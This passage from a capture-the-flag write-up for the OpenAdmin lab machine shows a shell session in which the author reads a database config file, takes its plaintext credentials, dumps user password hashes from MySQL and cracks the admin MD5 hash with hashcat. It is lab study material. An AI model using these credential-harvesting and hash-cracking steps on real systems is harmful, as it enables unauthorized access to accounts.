DB
I found that port 3306 on the loopback is up and listening
www-data@openadmin:/opt/ona/www/local/config$ cat database_settings.inc.php
cat database_settings.inc.php<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
?>I found the config file for the local DB; /opt/ona/www/local/config/database_settings.inc.php
i can see the db credential; ona_sys:n1nj4W4rri0R!
mysql
www-data@openadmin:/opt/ona/www/local/config$ mysql -uona_sys -p
=
Enter password: n1nj4W4rri0R!
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 90
Server version: 5.7.28-0ubuntu0.18.04.4 (Ubuntu)
Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
www-data@openadmin:/opt/ona/www/local/config$ mysql -uona_sys -p
mysql -uona_sys -p
Enter password: n1nj4W4rri0R!
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 90
Server version: 5.7.28-0ubuntu0.18.04.4 (Ubuntu)
Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| ona_default |
+--------------------+
2 rows in set (0.02 sec)
mysql> use ona_default;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+------------------------+
| Tables_in_ona_default |
+------------------------+
| [...] |
| ona_logs |
| permissions |
| sessions |
| subnet_types |
| subnets |
| sys_config |
| users |
+------------------------+
40 rows in set (0.00 sec)
mysql> select id,username,password from users;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | guest | 098f6bcd4621d373cade4e832627b4f6 |
| 2 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)I logged in to the mysql server with the credential found above
I was able to find credential hashes for 2 users; admin and guest
I am interested in the admin user
Hashcat
┌──(kali㉿kali)-[~/archive/htb/labs/openadmin]
└─$ hashcat -a 0 -m 0 admin.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.0+debian Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* device #1: pthread-11th Gen Intel(R) Core(TM) i9-11900H @ 2.50GHz, 1438/2941 MB (512 MB allocatable), 4MCU
minimum password length supported by kernel: 0
maximum password length supported by kernel: 256
hashes: 1 digests; 1 unique digests, 1 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
watchdog: Temperature abort trigger set to 90c
host memory required for this attack: 0 MB
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344385
* bytes.....: 139921507
* keyspace..: 14344385
21232f297a57a5a743894a0e4a801fc3:admin
session..........: hashcat
status...........: Cracked
hash.mode........: 0 (MD5)
hash.target......: 21232f297a57a5a743894a0e4a801fc3
time.started.....: Tue Oct 11 17:21:15 2022 (0 secs)
time.estimated...: Tue Oct 11 17:21:15 2022 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........: 311.3 kH/s (0.07ms) @ Accel:256 Loops:1 Thr:1 Vec:8
recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
progress.........: 20480/14344385 (0.14%)
rejected.........: 0/20480 (0.00%)
restore.point....: 19456/14344385 (0.14%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
candidate.engine.: Device Generator
candidates.#1....: leonardo1 -> michelle4
hardware.mon.#1..: Util: 27%
started: Tue Oct 11 17:21:15 2022
stopped: Tue Oct 11 17:21:17 2022Hashcat cracked the password hash for the admin user; admin
This doesn’t provide anything valuable as it is a web credential